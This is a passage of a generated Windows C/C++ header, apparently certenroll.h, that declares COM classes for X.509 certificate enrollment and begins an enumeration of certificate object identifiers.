#define __CX500DistinguishedName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX500DistinguishedName CX500DistinguishedName;
#else
typedef struct CX500DistinguishedName CX500DistinguishedName;
#endif /* __cplusplus */

#endif 	/* __CX500DistinguishedName_FWD_DEFINED__ */


#ifndef __CCspInformation_FWD_DEFINED__
#define __CCspInformation_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformation CCspInformation;
#else
typedef struct CCspInformation CCspInformation;
#endif /* __cplusplus */

#endif 	/* __CCspInformation_FWD_DEFINED__ */


#ifndef __CCspInformations_FWD_DEFINED__
#define __CCspInformations_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformations CCspInformations;
#else
typedef struct CCspInformations CCspInformations;
#endif /* __cplusplus */

#endif 	/* __CCspInformations_FWD_DEFINED__ */


#ifndef __CCspStatus_FWD_DEFINED__
#define __CCspStatus_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspStatus CCspStatus;
#else
typedef struct CCspStatus CCspStatus;
#endif /* __cplusplus */

#endif 	/* __CCspStatus_FWD_DEFINED__ */


#ifndef __CX509PublicKey_FWD_DEFINED__
#define __CX509PublicKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PublicKey CX509PublicKey;
#else
typedef struct CX509PublicKey CX509PublicKey;
#endif /* __cplusplus */

#endif 	/* __CX509PublicKey_FWD_DEFINED__ */


#ifndef __CX509PrivateKey_FWD_DEFINED__
#define __CX509PrivateKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PrivateKey CX509PrivateKey;
#else
typedef struct CX509PrivateKey CX509PrivateKey;
#endif /* __cplusplus */

#endif 	/* __CX509PrivateKey_FWD_DEFINED__ */


#ifndef __CX509EndorsementKey_FWD_DEFINED__
#define __CX509EndorsementKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EndorsementKey CX509EndorsementKey;
#else
typedef struct CX509EndorsementKey CX509EndorsementKey;
#endif /* __cplusplus */

#endif 	/* __CX509EndorsementKey_FWD_DEFINED__ */


#ifndef __CX509Extension_FWD_DEFINED__
#define __CX509Extension_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Extension CX509Extension;
#else
typedef struct CX509Extension CX509Extension;
#endif /* __cplusplus */

#endif 	/* __CX509Extension_FWD_DEFINED__ */


#ifndef __CX509Extensions_FWD_DEFINED__
#define __CX509Extensions_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Extensions CX509Extensions;
#else
typedef struct CX509Extensions CX509Extensions;
#endif /* __cplusplus */

#endif 	/* __CX509Extensions_FWD_DEFINED__ */


#ifndef __CX509ExtensionKeyUsage_FWD_DEFINED__
#define __CX509ExtensionKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#else
typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#else
typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplateName_FWD_DEFINED__
#define __CX509ExtensionTemplateName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplateName CX509ExtensionTemplateName;
#else
typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplate_FWD_DEFINED__
#define __CX509ExtensionTemplate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplate CX509ExtensionTemplate;
#else
typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __CAlternativeName_FWD_DEFINED__
#define __CAlternativeName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeName CAlternativeName;
#else
typedef struct CAlternativeName CAlternativeName;
#endif /* __cplusplus */

#endif 	/* __CAlternativeName_FWD_DEFINED__ */


#ifndef __CAlternativeNames_FWD_DEFINED__
#define __CAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeNames CAlternativeNames;
#else
typedef struct CAlternativeNames CAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionAlternativeNames_FWD_DEFINED__
#define __CX509ExtensionAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#else
typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionBasicConstraints_FWD_DEFINED__
#define __CX509ExtensionBasicConstraints_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#else
typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#else
typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#else
typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __CSmimeCapability_FWD_DEFINED__
#define __CSmimeCapability_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapability CSmimeCapability;
#else
typedef struct CSmimeCapability CSmimeCapability;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapability_FWD_DEFINED__ */


#ifndef __CSmimeCapabilities_FWD_DEFINED__
#define __CSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapabilities CSmimeCapabilities;
#else
typedef struct CSmimeCapabilities CSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __CX509ExtensionSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#else
typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CPolicyQualifier_FWD_DEFINED__
#define __CPolicyQualifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifier CPolicyQualifier;
#else
typedef struct CPolicyQualifier CPolicyQualifier;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifier_FWD_DEFINED__ */


#ifndef __CPolicyQualifiers_FWD_DEFINED__
#define __CPolicyQualifiers_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifiers CPolicyQualifiers;
#else
typedef struct CPolicyQualifiers CPolicyQualifiers;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifiers_FWD_DEFINED__ */


#ifndef __CCertificatePolicy_FWD_DEFINED__
#define __CCertificatePolicy_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicy CCertificatePolicy;
#else
typedef struct CCertificatePolicy CCertificatePolicy;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicy_FWD_DEFINED__ */


#ifndef __CCertificatePolicies_FWD_DEFINED__
#define __CCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicies CCertificatePolicies;
#else
typedef struct CCertificatePolicies CCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __CX509ExtensionCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#else
typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#else
typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __CX509Attribute_FWD_DEFINED__
#define __CX509Attribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attribute CX509Attribute;
#else
typedef struct CX509Attribute CX509Attribute;
#endif /* __cplusplus */

#endif 	/* __CX509Attribute_FWD_DEFINED__ */


#ifndef __CX509Attributes_FWD_DEFINED__
#define __CX509Attributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attributes CX509Attributes;
#else
typedef struct CX509Attributes CX509Attributes;
#endif /* __cplusplus */

#endif 	/* __CX509Attributes_FWD_DEFINED__ */


#ifndef __CX509AttributeExtensions_FWD_DEFINED__
#define __CX509AttributeExtensions_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeExtensions CX509AttributeExtensions;
#else
typedef struct CX509AttributeExtensions CX509AttributeExtensions;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __CX509AttributeClientId_FWD_DEFINED__
#define __CX509AttributeClientId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeClientId CX509AttributeClientId;
#else
typedef struct CX509AttributeClientId CX509AttributeClientId;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeClientId_FWD_DEFINED__ */


#ifndef __CX509AttributeRenewalCertificate_FWD_DEFINED__
#define __CX509AttributeRenewalCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#else
typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKey_FWD_DEFINED__
#define __CX509AttributeArchiveKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKey CX509AttributeArchiveKey;
#else
typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __CX509AttributeArchiveKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#else
typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __CX509AttributeOSVersion_FWD_DEFINED__
#define __CX509AttributeOSVersion_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeOSVersion CX509AttributeOSVersion;
#else
typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __CX509AttributeCspProvider_FWD_DEFINED__
#define __CX509AttributeCspProvider_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeCspProvider CX509AttributeCspProvider;
#else
typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __CCryptAttribute_FWD_DEFINED__
#define __CCryptAttribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttribute CCryptAttribute;
#else
typedef struct CCryptAttribute CCryptAttribute;
#endif /* __cplusplus */

#endif 	/* __CCryptAttribute_FWD_DEFINED__ */


#ifndef __CCryptAttributes_FWD_DEFINED__
#define __CCryptAttributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttributes CCryptAttributes;
#else
typedef struct CCryptAttributes CCryptAttributes;
#endif /* __cplusplus */

#endif 	/* __CCryptAttributes_FWD_DEFINED__ */


#ifndef __CCertProperty_FWD_DEFINED__
#define __CCertProperty_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperty CCertProperty;
#else
typedef struct CCertProperty CCertProperty;
#endif /* __cplusplus */

#endif 	/* __CCertProperty_FWD_DEFINED__ */


#ifndef __CCertProperties_FWD_DEFINED__
#define __CCertProperties_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperties CCertProperties;
#else
typedef struct CCertProperties CCertProperties;
#endif /* __cplusplus */

#endif 	/* __CCertProperties_FWD_DEFINED__ */


#ifndef __CCertPropertyFriendlyName_FWD_DEFINED__
#define __CCertPropertyFriendlyName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyFriendlyName CCertPropertyFriendlyName;
#else
typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __CCertPropertyDescription_FWD_DEFINED__
#define __CCertPropertyDescription_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyDescription CCertPropertyDescription;
#else
typedef struct CCertPropertyDescription CCertPropertyDescription;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyDescription_FWD_DEFINED__ */


#ifndef __CCertPropertyAutoEnroll_FWD_DEFINED__
#define __CCertPropertyAutoEnroll_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#else
typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __CCertPropertyRequestOriginator_FWD_DEFINED__
#define __CCertPropertyRequestOriginator_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#else
typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __CCertPropertySHA1Hash_FWD_DEFINED__
#define __CCertPropertySHA1Hash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertySHA1Hash CCertPropertySHA1Hash;
#else
typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __CCertPropertyKeyProvInfo_FWD_DEFINED__
#define __CCertPropertyKeyProvInfo_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#else
typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __CCertPropertyArchived_FWD_DEFINED__
#define __CCertPropertyArchived_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchived CCertPropertyArchived;
#else
typedef struct CCertPropertyArchived CCertPropertyArchived;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchived_FWD_DEFINED__ */


#ifndef __CCertPropertyBackedUp_FWD_DEFINED__
#define __CCertPropertyBackedUp_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyBackedUp CCertPropertyBackedUp;
#else
typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollment_FWD_DEFINED__
#define __CCertPropertyEnrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollment CCertPropertyEnrollment;
#else
typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __CCertPropertyRenewal_FWD_DEFINED__
#define __CCertPropertyRenewal_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRenewal CCertPropertyRenewal;
#else
typedef struct CCertPropertyRenewal CCertPropertyRenewal;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRenewal_FWD_DEFINED__ */


#ifndef __CCertPropertyArchivedKeyHash_FWD_DEFINED__
#define __CCertPropertyArchivedKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#else
typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#else
typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __CSignerCertificate_FWD_DEFINED__
#define __CSignerCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSignerCertificate CSignerCertificate;
#else
typedef struct CSignerCertificate CSignerCertificate;
#endif /* __cplusplus */

#endif 	/* __CSignerCertificate_FWD_DEFINED__ */


#ifndef __CX509NameValuePair_FWD_DEFINED__
#define __CX509NameValuePair_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509NameValuePair CX509NameValuePair;
#else
typedef struct CX509NameValuePair CX509NameValuePair;
#endif /* __cplusplus */

#endif 	/* __CX509NameValuePair_FWD_DEFINED__ */


#ifndef __CCertificateAttestationChallenge_FWD_DEFINED__
#define __CCertificateAttestationChallenge_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificateAttestationChallenge CCertificateAttestationChallenge;
#else
typedef struct CCertificateAttestationChallenge CCertificateAttestationChallenge;
#endif /* __cplusplus */

#endif 	/* __CCertificateAttestationChallenge_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs10_FWD_DEFINED__
#define __CX509CertificateRequestPkcs10_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#else
typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCertificate_FWD_DEFINED__
#define __CX509CertificateRequestCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#else
typedef struct CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs7_FWD_DEFINED__
#define __CX509CertificateRequestPkcs7_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#else
typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCmc_FWD_DEFINED__
#define __CX509CertificateRequestCmc_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCmc CX509CertificateRequestCmc;
#else
typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __CX509Enrollment_FWD_DEFINED__
#define __CX509Enrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Enrollment CX509Enrollment;
#else
typedef struct CX509Enrollment CX509Enrollment;
#endif /* __cplusplus */

#endif 	/* __CX509Enrollment_FWD_DEFINED__ */


#ifndef __CX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __CX509EnrollmentWebClassFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#else
typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentHelper_FWD_DEFINED__
#define __CX509EnrollmentHelper_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentHelper CX509EnrollmentHelper;
#else
typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __CX509MachineEnrollmentFactory_FWD_DEFINED__
#define __CX509MachineEnrollmentFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#else
typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#endif /* __cplusplus */

#endif 	/* __CX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__
#define __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#else
typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyWebService_FWD_DEFINED__
#define __CX509EnrollmentPolicyWebService_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#else
typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyWebService_FWD_DEFINED__ */


#ifndef __CX509PolicyServerListManager_FWD_DEFINED__
#define __CX509PolicyServerListManager_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerListManager CX509PolicyServerListManager;
#else
typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __CX509PolicyServerUrl_FWD_DEFINED__
#define __CX509PolicyServerUrl_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerUrl CX509PolicyServerUrl;
#else
typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __CX509CertificateTemplateADWritable_FWD_DEFINED__
#define __CX509CertificateTemplateADWritable_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#else
typedef struct CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateTemplateADWritable_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationListEntry_FWD_DEFINED__
#define __CX509CertificateRevocationListEntry_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationListEntry CX509CertificateRevocationListEntry;
#else
typedef struct CX509CertificateRevocationListEntry CX509CertificateRevocationListEntry;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationListEntry_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationListEntries_FWD_DEFINED__
#define __CX509CertificateRevocationListEntries_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationListEntries CX509CertificateRevocationListEntries;
#else
typedef struct CX509CertificateRevocationListEntries CX509CertificateRevocationListEntries;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationListEntries_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationList_FWD_DEFINED__
#define __CX509CertificateRevocationList_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationList CX509CertificateRevocationList;
#else
typedef struct CX509CertificateRevocationList CX509CertificateRevocationList;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationList_FWD_DEFINED__ */


#ifndef __CX509SCEPEnrollment_FWD_DEFINED__
#define __CX509SCEPEnrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509SCEPEnrollment CX509SCEPEnrollment;
#else
typedef struct CX509SCEPEnrollment CX509SCEPEnrollment;
#endif /* __cplusplus */

#endif 	/* __CX509SCEPEnrollment_FWD_DEFINED__ */


#ifndef __CX509SCEPEnrollmentHelper_FWD_DEFINED__
#define __CX509SCEPEnrollmentHelper_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
#else
typedef struct CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
#endif /* __cplusplus */

#endif 	/* __CX509SCEPEnrollmentHelper_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "oaidl.h"
#include "certcli.h"
#include "certpol.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certenroll_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
#if defined(MIDL_PASS)
typedef typedef void VOID;
;

#endif
typedef 
enum CERTENROLL_OBJECTID
    {
        XCN_OID_NONE	= 0,
        XCN_OID_RSA	= 1,
        XCN_OID_PKCS	= 2,
        XCN_OID_RSA_HASH	= 3,
        XCN_OID_RSA_ENCRYPT	= 4,
        XCN_OID_PKCS_1	= 5,
        XCN_OID_PKCS_2	= 6,
        XCN_OID_PKCS_3	= 7,
        XCN_OID_PKCS_4	= 8,
        XCN_OID_PKCS_5	= 9,
        XCN_OID_PKCS_6	= 10,
        XCN_OID_PKCS_7	= 11,
        XCN_OID_PKCS_8	= 12,
        XCN_OID_PKCS_9	= 13,
        XCN_OID_PKCS_10	= 14,
        XCN_OID_PKCS_12	= 15,
        XCN_OID_RSA_RSA	= 16,
        XCN_OID_RSA_MD2RSA	= 17,
        XCN_OID_RSA_MD4RSA	= 18,
        XCN_OID_RSA_MD5RSA	= 19,
        XCN_OID_RSA_SHA1RSA	= 20,
        XCN_OID_RSA_SETOAEP_RSA	= 21,
        XCN_OID_RSA_DH	= 22,
        XCN_OID_RSA_data	= 23,
        XCN_OID_RSA_signedData	= 24,
        XCN_OID_RSA_envelopedData	= 25,
        XCN_OID_RSA_signEnvData	= 26,
        XCN_OID_RSA_digestedData	= 27,
        XCN_OID_RSA_hashedData	= 28,
        XCN_OID_RSA_encryptedData	= 29,
        XCN_OID_RSA_emailAddr	= 30,
        XCN_OID_RSA_unstructName	= 31,
        XCN_OID_RSA_contentType	= 32,
        XCN_OID_RSA_messageDigest	= 33,
        XCN_OID_RSA_signingTime	= 34,
        XCN_OID_RSA_counterSign	= 35,
        XCN_OID_RSA_challengePwd	= 36,
        XCN_OID_RSA_unstructAddr	= 37,
        XCN_OID_RSA_extCertAttrs	= 38,
        XCN_OID_RSA_certExtensions	= 39,
        XCN_OID_RSA_SMIMECapabilities	= 40,
        XCN_OID_RSA_preferSignedData	= 41,
        XCN_OID_RSA_SMIMEalg	= 42,
        XCN_OID_RSA_SMIMEalgESDH	= 43,
        XCN_OID_RSA_SMIMEalgCMS3DESwrap	= 44,
        XCN_OID_RSA_SMIMEalgCMSRC2wrap	= 45,
        XCN_OID_RSA_MD2	= 46,
        XCN_OID_RSA_MD4	= 47,
        XCN_OID_RSA_MD5	= 48,
        XCN_OID_RSA_RC2CBC	= 49,
        XCN_OID_RSA_RC4	= 50,
        XCN_OID_RSA_DES_EDE3_CBC	= 51,
        XCN_OID_RSA_RC5_CBCPad	= 52,
        XCN_OID_ANSI_X942	= 53,
        XCN_OID_ANSI_X942_DH	= 54,
        XCN_OID_X957	= 55,
        XCN_OID_X957_DSA	= 56,
        XCN_OID_X957_SHA1DSA	= 57,
        XCN_OID_DS	= 58,
        XCN_OID_DSALG	= 59,
        XCN_OID_DSALG_CRPT	= 60,
        XCN_OID_DSALG_HASH	= 61,
        XCN_OID_DSALG_SIGN	= 62,
        XCN_OID_DSALG_RSA	= 63,
        XCN_OID_OIW	= 64,
